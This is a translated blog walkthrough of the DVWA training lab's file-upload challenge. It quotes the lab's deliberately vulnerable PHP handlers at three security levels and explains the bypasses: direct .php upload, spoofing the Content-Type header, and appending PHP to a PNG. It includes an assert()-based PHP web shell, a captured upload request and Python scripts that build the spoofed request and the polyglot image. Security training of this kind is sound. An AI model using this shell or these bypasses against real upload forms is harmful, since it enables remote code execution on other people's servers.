Worked test examples for hunting the DVWA file upload vulnerability
Posted by: smiling | Source: PHP粉丝网 | Added: 2018-10-15 09:45:20 | Comments: 0
Low:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
Nothing about the file is checked: basename() only strips any directory part of the client-supplied name, so the extension and the content are accepted as-is and written into the web-accessible hackable/uploads/ directory. Upload a .php file directly, then request http://localhost/hackable/uploads/XX.php and the server executes it.
Medium:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Medium adds a check, but only on two values: $_FILES['uploaded']['type'], which PHP copies straight from the Content-Type header the client puts on the multipart part, and the size (below 100000 bytes). Neither the filename nor the actual bytes are inspected.
Bypass 1: null-byte truncation with Burp Suite. Rename the file to 1.php .jpg (note the space) so that the browser declares it as image/jpeg, then in the intercepted request replace the space with a 0x00 byte (hex view). Caveat: the stored name is only truncated at the null byte on PHP older than 5.3.4; later versions reject paths that contain a null byte. On this level the trick is not needed anyway, because the name is never checked.
Bypass 2: upload 2.php as-is and intercept the request. It looks like this:
POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549

-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream

<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['loveautumn']);
?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------143381619322555--
Change the file part's Content-Type line (Content-Type: application/octet-stream above) to Content-Type: image/jpeg and forward the request. The filter compares only that client-declared value, so 2.php is stored unchanged. The payload is an assert()-based one-liner that evaluates whatever arrives in the POST parameter loveautumn; since PHP 8.0 assert() no longer evaluates string arguments, so this particular shell only works on PHP 7 and earlier.
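The following is an added example for this write-up, not DVWA's own code. It rebuilds the multipart body of the captured request above with a chosen Content-Type on the file part, then parses the body the way PHP fills $_FILES and runs the Medium check against it, which shows that the server's only notion of "type" is the header the client wrote. The boundary, cookie and host are copied from the capture; nothing is sent to any server.

```python
"""Medium-level bypass, worked through offline.

Added example, not DVWA code. Rebuilds the captured upload request, then
parses it the way PHP populates $_FILES to show that 'type' is nothing more
than the client's own Content-Type header. Boundary/cookie from the capture.
"""
import re
from typing import Dict, Tuple

BOUNDARY = "---------------------------143381619322555"   # from the capture
COOKIE = "PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium"

# The assert()-based one-liner from the captured request (PHP 7 and earlier).
PHP_ONE_LINER = (b"<?php\n$item['wind'] = 'assert';\n$array[] = $item;\n"
                 b"$array[0]['wind']($_POST['loveautumn']);\n?>\n")


def build_multipart(filename: str, content: bytes, declared_type: str,
                    boundary: str = BOUNDARY) -> bytes:
    """multipart/form-data body with DVWA's three fields; declared_type becomes
    the file part's Content-Type, i.e. what PHP reports as $_FILES[..]['type']."""
    sep = ("--" + boundary).encode()
    return b"".join([
        sep + b'\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n',
        sep + b'\r\nContent-Disposition: form-data; name="uploaded"; filename="'
        + filename.encode() + b'"\r\nContent-Type: ' + declared_type.encode()
        + b"\r\n\r\n" + content + b"\r\n",
        sep + b'\r\nContent-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n',
        sep + b"--\r\n",
    ])


def build_request(body: bytes, host: str = "localhost",
                  path: str = "/vulnerabilities/upload/", cookie: str = COOKIE,
                  boundary: str = BOUNDARY) -> bytes:
    """Raw HTTP/1.1 request with Content-Length computed from the real body."""
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n")
    return head.encode() + body


def parse_multipart(body: bytes, boundary: str = BOUNDARY) -> Dict[str, dict]:
    """Minimal parser returning, per field, what PHP would expose:
    filename, type (the client's header, unverified), size and data."""
    sep = ("--" + boundary).encode()
    fields: Dict[str, dict] = {}
    for chunk in body.split(sep)[1:]:
        if chunk.startswith(b"--"):                 # closing delimiter
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        data = data[:-2] if data.endswith(b"\r\n") else data
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'name="([^"]*)"', disp).group(1)
        fname = re.search(r'filename="([^"]*)"', disp)
        fields[name] = {"filename": fname.group(1) if fname else None,
                        "type": headers.get("content-type"),
                        "size": len(data), "data": data}
    return fields


def medium_filter_accepts(part: dict) -> bool:
    """Exactly the Medium check: declared type and size, nothing else."""
    return (part["type"] in ("image/jpeg", "image/png")
            and part["size"] < 100000)


def demo() -> Tuple[bool, bool]:
    """(honest request accepted?, same bytes with spoofed Content-Type accepted?)"""
    honest = parse_multipart(build_multipart("2.php", PHP_ONE_LINER,
                                             "application/octet-stream"))
    spoofed = parse_multipart(build_multipart("2.php", PHP_ONE_LINER,
                                              "image/jpeg"))
    return (medium_filter_accepts(honest["uploaded"]),
            medium_filter_accepts(spoofed["uploaded"]))


if __name__ == "__main__":
    print(demo())                                   # (False, True)
    body = build_multipart("2.php", PHP_ONE_LINER, "image/jpeg")
    print(build_request(body).decode("latin-1"))    # paste into Burp Repeater
```

The request bytes from build_request() can be pasted into Burp Repeater or piped to netcat; the point of the parser is that the same PHP bytes are rejected or accepted purely on the value of a header the attacker controls.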
High:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
High no longer trusts the declared MIME type. It checks the filename extension (everything after the last dot, lower-cased) against jpg, jpeg and png, requires a size below 100000 bytes, and requires getimagesize() to recognise the temporary file as an image. The extension check can be worked through exactly: for 1.php.png, strrpos() finds the last dot at offset 5 and substr() takes the part from offset 6, which is "png", so that name passes the whitelist. Note that the code renames nothing; the file is stored under its original basename, 1.php.png, and with a default Apache/PHP configuration only names ending in .php are handed to the PHP interpreter, so a .png upload is served as an image rather than executed. The getimagesize() check, on the other hand, only reads the image header, which is what file-header spoofing relies on.
To spoof the image check, append the PHP one-liner after the end of a genuine image. Opening a binary image in Notepad and pasting the code at the bottom is the approach described in the original, but a text editor may re-encode and corrupt the image data; appending on the command line is safer, for example `copy /b image.png + shell.php out.png` on Windows or `cat shell.php >> image.png` on Linux. The image decoder reads the header and stops at the image's end marker, so getimagesize() still sees a valid image while the trailing PHP remains intact in the file.
Finally, try to get past the extension check. Rename the file to 1.php .png, upload it and intercept with Burp Suite; change
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"
to
Content-Disposition: form-data; name="uploaded"; filename="1.php\X00.php .png"
This yields a file named x00.php .png, something that was mentioned in an earlier article on PHP arbitrary file upload vulnerabilities. Space truncation has no effect here. I don't know the final answer yet; perhaps upload a jpg containing the one-liner and then finish it off with file inclusion? Leaving this open for now.
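To make the High-level behaviour testable without a DVWA instance, here is an added example (not DVWA's code) that re-implements the three High checks in Python, builds a valid 1x1 PNG with zlib, appends the one-liner to it, and runs the candidate names from the discussion above through the filter. getimagesize() here is a header-only sniff for PNG (PHP's function also handles JPEG, GIF and other formats), and stored_name() uses Python's ntpath/posixpath to reproduce PHP's basename(), which on Windows also treats the backslash as a directory separator; that is the assumed explanation for "1.php\X00.php .png" being stored as X00.php .png. The PNG and the case names are constructed for the example.

```python
"""High-level checks re-implemented so candidate uploads can be tested offline.

Added example, not DVWA code. uploaded_ext() and high_filter_accepts()
mirror the PHP above; getimagesize() is a PNG header-only sniff; the 1x1
PNG is constructed with zlib rather than read from disk.
"""
import ntpath
import posixpath
import struct
import zlib
from typing import Dict, Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Same assert()-based one-liner as in the Medium section.
PHP_ONE_LINER = (b"<?php\n$item['wind'] = 'assert';\n$array[] = $item;\n"
                 b"$array[0]['wind']($_POST['loveautumn']);\n?>\n")


def _chunk(tag: bytes, data: bytes) -> bytes:
    """PNG chunk: 4-byte length, tag, data, CRC32 over tag+data."""
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def make_png(width: int = 1, height: int = 1) -> bytes:
    """Valid 8-bit RGB PNG, all black: IHDR, one IDAT, IEND."""
    scanlines = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanlines)) + _chunk(b"IEND", b""))


def getimagesize(data: bytes) -> Optional[Tuple[int, int]]:
    """Header-only, like PHP: signature plus IHDR; trailing bytes are ignored."""
    if data[:8] == PNG_SIG and data[12:16] == b"IHDR":
        return struct.unpack(">II", data[16:24])
    return None


def uploaded_ext(name: str) -> str:
    """substr($name, strrpos($name, '.') + 1): the text after the LAST dot
    (strrpos returns false, which adds as 0, when there is no dot)."""
    pos = name.rfind(".")
    return name[pos + 1:] if pos >= 0 else name[1:]


def high_filter_accepts(filename: str, content: bytes) -> bool:
    """Whitelisted extension AND size < 100000 AND parses as an image."""
    return (uploaded_ext(filename).lower() in ("jpg", "jpeg", "png")
            and len(content) < 100000
            and getimagesize(content) is not None)


def stored_name(filename: str, windows: bool) -> str:
    """basename() as PHP applies it: on Windows a backslash is also a
    directory separator, so "1.php\\X00.php .png" is stored as "X00.php .png"."""
    return (ntpath if windows else posixpath).basename(filename)


def polyglot(image: bytes, php: bytes) -> bytes:
    """Append PHP after IEND: image decoders stop at IEND, the PHP
    interpreter only starts at '<?php', so both parsers are satisfied."""
    return image + php


def demo() -> Dict[str, bool]:
    """Run the constructed candidates through the High filter."""
    png = make_png()
    shell_png = polyglot(png, PHP_ONE_LINER)
    return {
        "shell.php, plain PHP": high_filter_accepts("shell.php", PHP_ONE_LINER),
        "shell.png, PHP renamed": high_filter_accepts("shell.png", PHP_ONE_LINER),
        "1.php.png, real PNG": high_filter_accepts("1.php.png", png),
        "1.png polyglot": high_filter_accepts("1.png", shell_png),
        "polyglot still decodes": getimagesize(shell_png) == (1, 1),
        "payload survives": shell_png.endswith(PHP_ONE_LINER),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:26s} -> {'accepted' if ok else 'rejected'}")
    print(stored_name("1.php\\X00.php .png", windows=True))   # X00.php .png
```

The run confirms the analysis above: the double extension 1.php.png passes because only the text after the last dot is compared, and a PNG with PHP appended passes all three checks while still decoding as an image. The check that defeats every case here is the extension whitelist combined with unchanged storage of the name, which is why what gets executed afterwards depends on how the web server maps .png files, not on the filter.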
Tags: DVWA, vulnerability hunting